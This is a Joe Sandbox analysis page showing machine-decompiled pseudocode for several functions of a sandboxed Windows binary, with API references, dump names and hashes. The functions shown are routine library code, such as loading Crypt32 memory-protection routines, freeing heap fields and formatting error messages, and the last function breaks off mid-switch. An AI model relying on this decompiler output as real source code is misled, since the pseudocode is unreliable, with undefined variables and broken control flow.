Function 00A3F2C5 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A3F2C5(struct HINSTANCE__** __ecx) {
				void* _t5;
				struct HINSTANCE__* _t6;
				struct HINSTANCE__** _t9;

				_t9 = __ecx;
				if(__ecx[1] == 0) {
					_t6 = E00A4081B(L"Crypt32.dll");
					 *__ecx = _t6;
					if(_t6 != 0) {
						_t9[2] = GetProcAddress(_t6, "CryptProtectMemory");
						_t6 = GetProcAddress( *_t9, "CryptUnprotectMemory");
						_t9[3] = _t6;
					}
					_t9[1] = 1;
					return _t6;
				}
				return _t5;
			}

0x00a3f2c6
0x00a3f2cc
0x00a3f2d3
0x00a3f2d8
0x00a3f2dc
0x00a3f2f1
0x00a3f2f4
0x00a3f2fa
0x00a3f2fa
0x00a3f2fd
0x00000000
0x00a3f2fd
0x00a3f302

APIs

Part of subcall function 00A4081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00A40836
Part of subcall function 00A4081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00A3F2D8,Crypt32.dll,00000000,00A3F35C,?,?,00A3F33E,?,?,?), ref: 00A40858

GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00A3F2E4
GetProcAddress.KERNEL32(00A781C8,CryptUnprotectMemory), ref: 00A3F2F4

Strings

CryptUnprotectMemory, xrefs: 00A3F2EA
CryptProtectMemory, xrefs: 00A3F2DE
Crypt32.dll, xrefs: 00A3F2CE

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: AddressProc$DirectoryLibraryLoadSystem
String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
API String ID: 2141747552-1753850145
Opcode ID: 07bf4e3d53dd03045b02a044e576cec05bbb4bafb7165c380beba12a76e791b5
Instruction ID: e63cabf037f14114c0c71698a41b24b1f370ca00f4844991d23aafe3fb726ca0
Opcode Fuzzy Hash: 07bf4e3d53dd03045b02a044e576cec05bbb4bafb7165c380beba12a76e791b5
Instruction Fuzzy Hash: 94E04F76924702AECF219BB49949B42BAF46F24740F14881DF0DB93680DAB5D5429B50

Uniqueness

Uniqueness Score: -1.00%

Function 00A52BDA Relevance: 7.7, APIs: 5, Instructions: 168
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 63%

			E00A52BDA(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed char* _t52;
				signed int _t53;
				intOrPtr _t54;
				signed int _t58;
				signed int _t61;
				intOrPtr _t71;
				signed int _t75;
				signed int _t79;
				signed char _t81;
				signed char _t84;
				signed int _t85;
				signed int _t86;
				signed int _t97;
				signed char _t99;
				signed int* _t100;
				signed char* _t103;
				signed int _t109;
				void* _t113;

				_push(0x10);
				_push(0xa6c248);
				E00A4F5F0(__ebx, __edi, __esi);
				_t75 = 0;
				_t52 =  *(_t113 + 0x10);
				_t81 = _t52[4];
				if(_t81 == 0 ||  *((intOrPtr*)(_t81 + 8)) == 0) {
					L30:
					_t53 = 0;
					__eflags = 0;
					goto L31;
				} else {
					_t99 = _t52[8];
					if(_t99 != 0 ||  *_t52 < 0) {
						_t84 =  *_t52;
						_t109 =  *(_t113 + 0xc);
						if(_t84 >= 0) {
							_t109 = _t109 + 0xc + _t99;
						}
						 *(_t113 - 4) = _t75;
						_t103 =  *(_t113 + 0x14);
						if(_t84 >= 0 || ( *_t103 & 0x00000010) == 0) {
							L10:
							_t54 =  *((intOrPtr*)(_t113 + 8));
							__eflags = _t84 & 0x00000008;
							if((_t84 & 0x00000008) == 0) {
								__eflags =  *_t103 & 0x00000001;
								if(( *_t103 & 0x00000001) == 0) {
									_t85 =  *(_t54 + 0x18);
									__eflags = _t103[0x18] - _t75;
									if(_t103[0x18] != _t75) {
										__eflags = _t85;
										if(_t85 == 0) {
											goto L32;
										} else {
											__eflags = _t109;
											if(_t109 == 0) {
												goto L32;
											} else {
												__eflags =  *_t103 & 0x00000004;
												_t79 = 0;
												_t75 = (_t79 & 0xffffff00 | ( *_t103 & 0x00000004) != 0x00000000) + 1;
												__eflags = _t75;
												 *(_t113 - 0x20) = _t75;
												goto L29;
											}
										}
									} else {
										__eflags = _t85;
										if(_t85 == 0) {
											goto L32;
										} else {
											__eflags = _t109;
											if(_t109 == 0) {
												goto L32;
											} else {
												E00A50320(_t109, E00A5027C(_t85,  &(_t103[8])), _t103[0x14]);
												goto L29;
											}
										}
									}
								} else {
									__eflags =  *(_t54 + 0x18);
									if( *(_t54 + 0x18) == 0) {
										goto L32;
									} else {
										__eflags = _t109;
										if(_t109 == 0) {
											goto L32;
										} else {
											E00A50320(_t109,  *(_t54 + 0x18), _t103[0x14]);
											__eflags = _t103[0x14] - 4;
											if(_t103[0x14] == 4) {
												__eflags =  *_t109;
												if( *_t109 != 0) {
													_push( &(_t103[8]));
													_push( *_t109);
													goto L21;
												}
											}
											goto L29;
										}
									}
								}
							} else {
								_t97 =  *(_t54 + 0x18);
								goto L12;
							}
						} else {
							_t71 =  *0xa9205c; // 0x0
							 *((intOrPtr*)(_t113 - 0x1c)) = _t71;
							if(_t71 == 0) {
								goto L10;
							} else {
								 *0xa63278();
								_t97 =  *((intOrPtr*)(_t113 - 0x1c))();
								L12:
								if(_t97 == 0 || _t109 == 0) {
									L32:
									E00A58D24(_t75, _t99, _t103, _t109);
									asm("int3");
									_push(8);
									_push(0xa6c268);
									E00A4F5F0(_t75, _t103, _t109);
									_t100 =  *(_t113 + 0x10);
									_t86 =  *(_t113 + 0xc);
									__eflags =  *_t100;
									if(__eflags >= 0) {
										_t105 = _t86 + 0xc + _t100[2];
										__eflags = _t86 + 0xc + _t100[2];
									} else {
										_t105 = _t86;
									}
									 *(_t113 - 4) =  *(_t113 - 4) & 0x00000000;
									_t110 =  *(_t113 + 0x14);
									_push( *(_t113 + 0x14));
									_push(_t100);
									_push(_t86);
									_t77 =  *((intOrPtr*)(_t113 + 8));
									_push( *((intOrPtr*)(_t113 + 8)));
									_t58 = E00A52BDA(_t77, _t105, _t110, __eflags) - 1;
									__eflags = _t58;
									if(_t58 == 0) {
										_t61 = E00A538E4(_t105, _t110[0x18], E00A5027C( *((intOrPtr*)(_t77 + 0x18)),  &(_t110[8])));
									} else {
										_t61 = _t58 - 1;
										__eflags = _t61;
										if(_t61 == 0) {
											_t61 = E00A538F4(_t105, _t110[0x18], E00A5027C( *((intOrPtr*)(_t77 + 0x18)),  &(_t110[8])), 1);
										}
									}
									 *(_t113 - 4) = 0xfffffffe;
									 *[fs:0x0] =  *((intOrPtr*)(_t113 - 0x10));
									return _t61;
								} else {
									 *_t109 = _t97;
									_push( &(_t103[8]));
									_push(_t97);
									L21:
									 *_t109 = E00A5027C();
									L29:
									 *(_t113 - 4) = 0xfffffffe;
									_t53 = _t75;
									L31:
									 *[fs:0x0] =  *((intOrPtr*)(_t113 - 0x10));
									return _t53;
								}
							}
						}
					} else {
						goto L30;
					}
				}
			}

0x00a52bda
0x00a52bdc
0x00a52be1
0x00a52be6
0x00a52be8
0x00a52beb
0x00a52bf0
0x00a52d00
0x00a52d00
0x00a52d00
0x00000000
0x00a52bff
0x00a52bff
0x00a52c04
0x00a52c0e
0x00a52c10
0x00a52c15
0x00a52c1a
0x00a52c1a
0x00a52c1c
0x00a52c1f
0x00a52c24
0x00a52c46
0x00a52c46
0x00a52c49
0x00a52c4c
0x00a52c6a
0x00a52c6d
0x00a52cac
0x00a52caf
0x00a52cb2
0x00a52cd7
0x00a52cd9
0x00000000
0x00a52cdb
0x00a52cdb
0x00a52cdd
0x00000000
0x00a52cdf
0x00a52cdf
0x00a52ce4
0x00a52ce8
0x00a52ce8
0x00a52ce9
0x00000000
0x00a52ce9
0x00a52cdd
0x00a52cb4
0x00a52cb4
0x00a52cb6
0x00000000
0x00a52cb8
0x00a52cb8
0x00a52cba
0x00000000
0x00a52cbc
0x00a52ccd
0x00000000
0x00a52cd2
0x00a52cba
0x00a52cb6
0x00a52c6f
0x00a52c6f
0x00a52c73
0x00000000
0x00a52c79
0x00a52c79
0x00a52c7b
0x00000000
0x00a52c81
0x00a52c88
0x00a52c90
0x00a52c94
0x00a52c96
0x00a52c99
0x00a52c9e
0x00a52c9f
0x00000000
0x00a52c9f
0x00a52c99
0x00000000
0x00a52c94
0x00a52c7b
0x00a52c73
0x00a52c4e
0x00a52c4e
0x00000000
0x00a52c4e
0x00a52c2b
0x00a52c2b
0x00a52c30
0x00a52c35
0x00000000
0x00a52c37
0x00a52c39
0x00a52c42
0x00a52c51
0x00a52c53
0x00a52d12
0x00a52d12
0x00a52d17
0x00a52d18
0x00a52d1a
0x00a52d1f
0x00a52d24
0x00a52d27
0x00a52d2a
0x00a52d2d
0x00a52d36
0x00a52d36
0x00a52d2f
0x00a52d2f
0x00a52d2f
0x00a52d39
0x00a52d3d
0x00a52d40
0x00a52d41
0x00a52d42
0x00a52d43
0x00a52d46
0x00a52d4f
0x00a52d4f
0x00a52d52
0x00a52d88
0x00a52d54
0x00a52d54
0x00a52d54
0x00a52d57
0x00a52d6e
0x00a52d6e
0x00a52d57
0x00a52d8d
0x00a52d97
0x00a52da3
0x00a52c61
0x00a52c61
0x00a52c66
0x00a52c67
0x00a52ca1
0x00a52ca8
0x00a52cec
0x00a52cec
0x00a52cf3
0x00a52d02
0x00a52d05
0x00a52d11
0x00a52d11
0x00a52c53
0x00a52c35
0x00000000
0x00000000
0x00000000
0x00a52c04

APIs

___AdjustPointer.LIBCMT ref: 00A52CA1
___AdjustPointer.LIBCMT ref: 00A52CC4
_abort.LIBCMT ref: 00A52D12
___AdjustPointer.LIBCMT ref: 00A52D60

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: AdjustPointer$_abort
String ID:
API String ID: 2252061734-0
Opcode ID: 19499923b00391107066882154991e6ecefde9c90ee41b86187defb524c29ad7
Instruction ID: 7083c9166b33f1f8a73bef69018d00527a4fc34cf2cb5d97fcb2418123764144
Opcode Fuzzy Hash: 19499923b00391107066882154991e6ecefde9c90ee41b86187defb524c29ad7
Instruction Fuzzy Hash: B251E173600212AFDB298F14D945BBA77B4FF56312F24452DEC06476A2E731ED88D790

Uniqueness

Uniqueness Score: -1.00%

Function 00A5BF30 Relevance: 7.6, APIs: 5, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00A5BF30() {
				int _v8;
				void* __ecx;
				void* _t6;
				int _t7;
				char* _t13;
				int _t17;
				void* _t19;
				char* _t25;
				WCHAR* _t27;

				_t27 = GetEnvironmentStringsW();
				if(_t27 == 0) {
					L7:
					_t13 = 0;
				} else {
					_t6 = E00A5BEF9(_t27);
					_pop(_t19);
					_t17 = _t6 - _t27 >> 1;
					_t7 = WideCharToMultiByte(0, 0, _t27, _t17, 0, 0, 0, 0);
					_v8 = _t7;
					if(_t7 == 0) {
						goto L7;
					} else {
						_t25 = E00A58E06(_t19, _t7);
						if(_t25 == 0 || WideCharToMultiByte(0, 0, _t27, _t17, _t25, _v8, 0, 0) == 0) {
							_t13 = 0;
						} else {
							_t13 = _t25;
							_t25 = 0;
						}
						E00A58DCC(_t25);
					}
				}
				if(_t27 != 0) {
					FreeEnvironmentStringsW(_t27);
				}
				return _t13;
			}

0x00a5bf3f
0x00a5bf45
0x00a5bf9d
0x00a5bf9d
0x00a5bf47
0x00a5bf48
0x00a5bf4d
0x00a5bf56
0x00a5bf5c
0x00a5bf62
0x00a5bf67
0x00000000
0x00a5bf69
0x00a5bf6f
0x00a5bf74
0x00a5bf92
0x00a5bf8c
0x00a5bf8c
0x00a5bf8e
0x00a5bf8e
0x00a5bf95
0x00a5bf9a
0x00a5bf67
0x00a5bfa1
0x00a5bfa4
0x00a5bfa4
0x00a5bfb2

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00A5BF39
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00A5BF5C

Part of subcall function 00A58E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00A54286,?,0000015D,?,?,?,?,00A55762,000000FF,00000000,?,?), ref: 00A58E38

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00A5BF82
_free.LIBCMT ref: 00A5BF95
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00A5BFA4

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: 0efa27af7123bed1eae09394ef59bcb36aee646b81e6017a0a983ef9e2baf378
Instruction ID: c6fd3073d4c3db05e69a4814312585379d0a41aa31d5e1c74b4ad06327f28366
Opcode Fuzzy Hash: 0efa27af7123bed1eae09394ef59bcb36aee646b81e6017a0a983ef9e2baf378
Instruction Fuzzy Hash: 92015EB26256157F2B2156A65C49C7B6A7DFAC3BA33140229FD05D2141EB70CD0A95B0

Uniqueness

Uniqueness Score: -1.00%

Function 00A40EED Relevance: 7.5, APIs: 5, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00A40EED(void* __ecx) {
				intOrPtr _v16;
				void* __ebp;
				int _t16;
				long* _t20;
				void** _t26;
				void* _t28;
				void* _t30;
				intOrPtr _t31;

				_t22 = __ecx;
				_push(0xffffffff);
				_push(0xa62641);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t31;
				_t28 = __ecx;
				E00A411CF(__ecx);
				_t20 = 0;
				 *((char*)(__ecx + 0x314)) = 1;
				ReleaseSemaphore( *(__ecx + 0x318), 0x40, 0);
				if( *((intOrPtr*)(_t28 + 0x104)) > 0) {
					_t26 = _t28 + 4;
					do {
						E00A40FE4(_t22, _t30,  *_t26);
						CloseHandle( *_t26);
						_t20 = _t20 + 1;
						_t26 =  &(_t26[1]);
					} while (_t20 <  *((intOrPtr*)(_t28 + 0x104)));
				}
				DeleteCriticalSection(_t28 + 0x320);
				CloseHandle( *(_t28 + 0x318));
				_t16 = CloseHandle( *(_t28 + 0x31c));
				 *[fs:0x0] = _v16;
				return _t16;
			}

0x00a40eed
0x00a40ef6
0x00a40ef8
0x00a40efd
0x00a40efe
0x00a40f08
0x00a40f0a
0x00a40f0f
0x00a40f11
0x00a40f21
0x00a40f2d
0x00a40f2f
0x00a40f32
0x00a40f34
0x00a40f3b
0x00a40f41
0x00a40f42
0x00a40f45
0x00a40f32
0x00a40f54
0x00a40f60
0x00a40f6c
0x00a40f77
0x00a40f80

APIs

Part of subcall function 00A411CF: ResetEvent.KERNEL32(?), ref: 00A411E1
Part of subcall function 00A411CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00A411F5

ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00A40F21
CloseHandle.KERNEL32(?,?), ref: 00A40F3B
DeleteCriticalSection.KERNEL32(?), ref: 00A40F54
CloseHandle.KERNEL32(?), ref: 00A40F60
CloseHandle.KERNEL32(?), ref: 00A40F6C

Part of subcall function 00A40FE4: WaitForSingleObject.KERNEL32(?,000000FF,00A41101,?,?,00A4117F,?,?,?,?,?,00A41169), ref: 00A40FEA
Part of subcall function 00A40FE4: GetLastError.KERNEL32(?,?,00A4117F,?,?,?,?,?,00A41169), ref: 00A40FF6

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
String ID:
API String ID: 1868215902-0
Opcode ID: a22ecbda9021502877f3231b56857c4ed56a30e535ff9433ceacdc642f6e20ae
Instruction ID: ac3cd8e30559c1e3052dc408bf67659f28ab01cb81a5d668d59411b558915c1d
Opcode Fuzzy Hash: a22ecbda9021502877f3231b56857c4ed56a30e535ff9433ceacdc642f6e20ae
Instruction Fuzzy Hash: 1D015276100744FFCB229BA4DD84FC6BBB9FB48710F004929F25B52160C7B57A5ADB50

Uniqueness

Uniqueness Score: -1.00%

Function 00A5C7FF Relevance: 7.5, APIs: 5, Instructions: 40
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00A5C7FF(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t21 = _a4;
				if(_t21 != 0) {
					_t23 =  *_t21 -  *0xa6eea0; // 0xa6ee94
					if(_t23 != 0) {
						E00A58DCC(_t7);
					}
					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0xa6eea4; // 0xa926fc
					if(_t24 != 0) {
						E00A58DCC(_t8);
					}
					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0xa6eea8; // 0xa926fc
					if(_t25 != 0) {
						E00A58DCC(_t9);
					}
					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0xa6eed0; // 0xa6ee98
					if(_t26 != 0) {
						E00A58DCC(_t10);
					}
					_t6 =  *((intOrPtr*)(_t21 + 0x34));
					_t27 = _t6 -  *0xa6eed4; // 0xa92700
					if(_t27 != 0) {
						return E00A58DCC(_t6);
					}
				}
				return _t6;
			}

0x00a5c805
0x00a5c80a
0x00a5c80e
0x00a5c814
0x00a5c817
0x00a5c81c
0x00a5c820
0x00a5c826
0x00a5c829
0x00a5c82e
0x00a5c832
0x00a5c838
0x00a5c83b
0x00a5c840
0x00a5c844
0x00a5c84a
0x00a5c84d
0x00a5c852
0x00a5c853
0x00a5c856
0x00a5c85c
0x00000000
0x00a5c864
0x00a5c85c
0x00a5c867

APIs

_free.LIBCMT ref: 00A5C817

Part of subcall function 00A58DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00A5C896,?,00000000,?,00000000,?,00A5C8BD,?,00000007,?,?,00A5CCBA,?), ref: 00A58DE2
Part of subcall function 00A58DCC: GetLastError.KERNEL32(?,?,00A5C896,?,00000000,?,00000000,?,00A5C8BD,?,00000007,?,?,00A5CCBA,?,?), ref: 00A58DF4

_free.LIBCMT ref: 00A5C829
_free.LIBCMT ref: 00A5C83B
_free.LIBCMT ref: 00A5C84D
_free.LIBCMT ref: 00A5C85F

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 3e5d9eb28b3fd18537b8c33d3738f6c7bc3a01471ba9e7e3c63d0c9216700299
Instruction ID: 9e8119fd135bbfc8d144ce3538472b8f6ed7a07ffdf27700212aa056fb387b81
Opcode Fuzzy Hash: 3e5d9eb28b3fd18537b8c33d3738f6c7bc3a01471ba9e7e3c63d0c9216700299
Instruction Fuzzy Hash: 86F01D33504304BFC620EBA8F986C1A73F9FA10B267641819F908E7556CFB5FC89CA64

Uniqueness

Uniqueness Score: -1.00%

Function 00A41FDD Relevance: 7.5, APIs: 5, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A41FDD(void* __eflags, short* _a4, short* _a8, int _a12) {
				void* _t10;
				int _t22;
				int _t23;

				_t10 = E00A53E13(_a4);
				_t23 = _a12;
				if(_t10 + 1 >= _t23) {
					_t22 = _t23;
				} else {
					_t4 = E00A53E13(_a4) + 1; // 0x1
					_t22 = _t4;
				}
				if(E00A53E13(_a8) + 1 < _t23) {
					_t7 = E00A53E13(_a8) + 1; // 0x1
					_t23 = _t7;
				}
				return CompareStringW(0x400, 0x1001, _a4, _t22, _a8, _t23) - 2;
			}

0x00a41fe5
0x00a41fea
0x00a41ff1
0x00a42001
0x00a41ff3
0x00a41ffc
0x00a41ffc
0x00a41ffc
0x00a4200f
0x00a4201a
0x00a4201a
0x00a4201a
0x00a4203b

APIs

_wcslen.LIBCMT ref: 00A41FE5
_wcslen.LIBCMT ref: 00A41FF6
_wcslen.LIBCMT ref: 00A42006
_wcslen.LIBCMT ref: 00A42014
CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,00A3B371,?,?,00000000,?,?,?), ref: 00A4202F

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: _wcslen$CompareString
String ID:
API String ID: 3397213944-0
Opcode ID: bb7a95d520a15363a1860fc844ee417261fb7f3c2cb63895601bc809251c426d
Instruction ID: ee9a1055c6e4b5b64a61c054be8800537aa2fd6f0bacb8b7067d213db8f8fdab
Opcode Fuzzy Hash: bb7a95d520a15363a1860fc844ee417261fb7f3c2cb63895601bc809251c426d
Instruction Fuzzy Hash: DEF01D33408014BBCF225F91EC0AECA7FA6EBC47A1B118415FE1A5B061CB729A65D790

Uniqueness

Uniqueness Score: -1.00%

Function 00A415FE Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 197
COMMON

Download Yara Rule

C-Code - Quality: 19%

			E00A415FE(intOrPtr* __ecx) {
				char _v516;
				char _v5124;
				signed int _t33;
				void* _t45;
				signed int _t46;
				signed int _t47;
				signed int _t48;
				signed int _t51;
				void* _t61;
				void* _t62;

				E00A4EC50(0x1400);
				_t57 = __ecx;
				_t33 =  *(__ecx + 0x48);
				_t61 = _t33 - 0x74;
				if(_t61 > 0) {
					__eflags = _t33 - 0x83;
					if(_t33 == 0x83) {
						E00A4D694();
						__eflags =  *(_t57 + 4);
						if( *(_t57 + 4) == 0) {
							E00A40602( &_v5124, E00A3E617(0xc9), 0xa00);
						} else {
							E00A34092( &_v5124, 0xa00, E00A3E617(0xca),  *(_t57 + 4));
						}
						return E00A4A7E4( *0xa78450,  &_v5124, E00A3E617(0x96), 0);
					}
				} else {
					if(_t61 == 0) {
						_push(0x456);
						L38:
						_push(E00A3E617());
						_push( *_t57);
						L19:
						_t45 = E00A4B776();
						L11:
						return _t45;
					}
					_t62 = _t33 - 0x16;
					if(_t62 > 0) {
						__eflags = _t33 - 0x38;
						if(__eflags > 0) {
							_t46 = _t33 - 0x39;
							__eflags = _t46;
							if(_t46 == 0) {
								_push(0x8c);
								goto L38;
							}
							_t47 = _t46 - 1;
							__eflags = _t47;
							if(_t47 == 0) {
								_push(0x6f);
								goto L38;
							}
							_t48 = _t47 - 1;
							__eflags = _t48;
							if(_t48 == 0) {
								_push( *((intOrPtr*)(__ecx + 4)));
								_push(0x406);
								goto L13;
							}
							_t51 = _t48 - 9;
							__eflags = _t51;
							if(_t51 == 0) {
								_push(0x343);
								goto L38;
							}
							_t33 = _t51 - 1;
							__eflags = _t33;
							if(_t33 == 0) {
								_push(0x86);
								goto L38;
							}
						} else {
							if(__eflags == 0) {
								_push(0x67);
								goto L38;
							}
							_t33 = _t33 - 0x17;
							__eflags = _t33 - 0xb;
							if(_t33 <= 0xb) {
								switch( *((intOrPtr*)(_t33 * 4 +  &M00A4190E))) {
									case 0:
										_push(0xde);
										goto L18;
									case 1:
										_push(0xe1);
										goto L18;
									case 2:
										_push(0xb4);
										goto L38;
									case 3:
										_push(0x69);
										goto L38;
									case 4:
										_push(0x6a);
										goto L38;
									case 5:
										_push( *((intOrPtr*)(__esi + 4)));
										_push(0x68);
										goto L13;
									case 6:
										_push(0x46f);
										goto L38;
									case 7:
										_push(0x470);
										goto L38;
									case 8:
										_push( *((intOrPtr*)(__esi + 4)));
										_push(0x471);
										goto L13;
									case 9:
										goto L64;
									case 0xa:
										_push( *((intOrPtr*)(__esi + 4)));
										_push(0x71);
										goto L13;
									case 0xb:
										E00A3E617(0xc8) =  &_v516;
										__eax = E00A34092( &_v516, 0x100,  &_v516,  *((intOrPtr*)(__esi + 4)));
										_push( *((intOrPtr*)(__esi + 8)));
										__eax =  &_v516;
										_push( &_v516);
										return E00A4B776( *__esi, L"%s: %s");
								}
							}
						}
					} else {
						if(_t62 == 0) {
							_push( *__ecx);
							_push(0xdd);
							L23:
							E00A3E617();
							L7:
							_push(0);
							L8:
							return E00A4B776();
						}
						if(_t33 <= 0x15) {
							switch( *((intOrPtr*)(_t33 * 4 +  &M00A418B6))) {
								case 0:
									_push( *__esi);
									_push(L"%ls");
									_push(">");
									goto L8;
								case 1:
									_push( *__ecx);
									_push(L"%ls");
									goto L7;
								case 2:
									_push(0);
									__eax = E00A4AECD();
									goto L11;
								case 3:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x7b);
									goto L13;
								case 4:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x7a);
									goto L13;
								case 5:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x7c);
									goto L13;
								case 6:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0xca);
									goto L13;
								case 7:
									_push(0x70);
									L18:
									_push(E00A3E617());
									_push(0);
									goto L19;
								case 8:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x72);
									goto L13;
								case 9:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x78);
									goto L13;
								case 0xa:
									_push( *__esi);
									_push(0x85);
									goto L23;
								case 0xb:
									_push( *__esi);
									_push(0x204);
									goto L23;
								case 0xc:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x84);
									goto L13;
								case 0xd:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x83);
									goto L13;
								case 0xe:
									goto L64;
								case 0xf:
									_push( *((intOrPtr*)(__esi + 8)));
